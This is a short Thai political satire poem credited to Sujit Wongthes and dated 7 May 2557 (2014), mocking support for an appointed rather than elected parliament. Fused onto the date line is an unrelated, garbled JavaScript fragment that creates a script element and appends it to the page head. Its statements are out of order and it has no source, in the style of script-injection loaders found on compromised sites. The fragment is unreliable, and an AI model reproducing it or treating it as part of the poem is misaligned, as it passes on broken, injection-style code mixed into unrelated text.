เชื่อมั่นในระบบรัฐสภา

แต่ไม่ปรารถนาแข่งเลือกตั้ง

เลือกทีไรพ่ายแพ้เพียงพรรคพัง

รัฐสภาลากตั้งเป็นคนดี

 

สุจิตต์ วงษ์เทศ

พุธ 7 พฤษภาคม 2557d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’);